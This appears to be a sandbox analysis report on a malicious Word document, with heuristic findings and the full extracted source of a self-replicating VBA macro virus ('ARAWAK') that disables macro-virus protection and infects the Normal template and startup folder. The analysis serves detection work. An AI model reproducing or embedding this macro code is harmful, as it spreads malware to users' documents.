MALICIOUS
176
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample contains legacy WordBasic macro virus markers and VBA macros, including AutoOpen and Auto_Close functions. The script attempts to disable virus protection and export a macro to 'c:\magrip.sys', then imports another script from 'c:\ARAWAK2.sys' to potentially establish persistence by modifying the 'Word81.dot' template. The specific family is not identifiable from the provided evidence.
Heuristics 6
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCEThe macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.Matched line in script
ActiveDocument.SaveAs FileName:=Application.StartupPath & "\Word81.dot", FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3162 bytes |
SHA-256: adcb2db55f32479689af8b00cd21ba4a5351648cc81ad4d70bf3f074fd683e53 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ARAWAK"
Sub AutoExec()
On Error Resume Next
Application.VBE.ActiveVBProject.VBComponents.Item("ARAWAK").Export "c:\magrip.sys"
Call Ekeko
If UCase(Dir(Application.StartupPath & "\Word81.dot")) <> "WORD81.DOT" Then
Documents.Add Template:="", NewTemplate:=False
Open "c:\ARAWAK2.sys" For Output As 1
Print #1, "Attribute VB_Name = ""ARAWAK2"""
Print #1, "Sub FileSave()"
Print #1, "On Error Resume Next"
Print #1, "If NormalTemplate.VBProject.VBComponents.Item(""ARAWAK"").Name <> ""ARAWAK"" Then"
Print #1, "NormalTemplate.VBProject.VBComponents.Import ""c:\magrip.sys"""
Print #1, "End If"
Print #1, "ActiveDocument.Save"
Print #1, "End Sub"
Close 1
ActiveDocument.VBProject.VBComponents.Import "c:\ARAWAK2.sys"
ActiveDocument.SaveAs FileName:=Application.StartupPath & "\Word81.dot", FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False
Windows("Word81.dot").Close
End If
End Sub
Sub AutoOpen()
Dim Set1 As Long
On Error Resume Next
Set1 = &H0
Options.VirusProtection = False
System.ProfileString("Options", "EnableMacroVirusProtection") = "0"
Application.VBE.ActiveVBProject.VBComponents.Item("ARAWAK").Export "c:\magrip.sys"
Call Ekeko
End Sub
Sub tutu()
Dim Set1 As Long
Dim WN, WD As Boolean
On Error Resume Next
Set1 = &H0
Options.VirusProtection = False
System.ProfileString("Options", "EnableMacroVirusProtection") = "0"
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
Application.VBE.ActiveVBProject.VBComponents.Item("ARAWAK").Export "c:\magrip.sys"
WD = True
WN = True
If UCase(NormalTemplate.VBProject.VBComponents.Item("ARAWAK").Name) <> "ARAWAK" Then
WN = False
End If
If UCase(ActiveDocument.VBProject.VBComponents.Item("ARAWAK").Name) <> "ARAWAK" Then
WD = False
End If
If WN = False Then
NormalTemplate.VBProject.VBComponents.Import "c:\magrip.sys"
NormalTemplate.Save
End If
If WD = False Then
ActiveDocument.VBProject.VBComponents.Import "c:\magrip.sys"
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
Call Ekeko
End Sub
Sub AutoExit()
On Error Resume Next
Application.VBE.ActiveVBProject.VBComponents.Item("ARAWAK").Export "c:\magrip.sys"
Call tutu
Call AutoExec
End Sub
Sub FileSave()
On Error Resume Next
Application.VBE.ActiveVBProject.VBComponents.Item("ARAWAK").Export "c:\magrip.sys"
Call tutu
Call AutoExec
ActiveDocument.Save
End Sub
Sub AutoClose()
On Error Resume Next
Application.VBE.ActiveVBProject.VBComponents.Item("ARAWAK").Export "c:\magrip.sys"
Call tutu
Call AutoExec
End Sub
Sub Ekeko()
Yin = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
If Yin < 4 Then
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromString "Sub ToolsMacro()" & vbCr & "End Sub" & vbCr & "Sub FileTemplates()" & vbCr & "End Sub" & vbCr & "Sub ViewVBCode()" & vbCr & "End Sub"
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.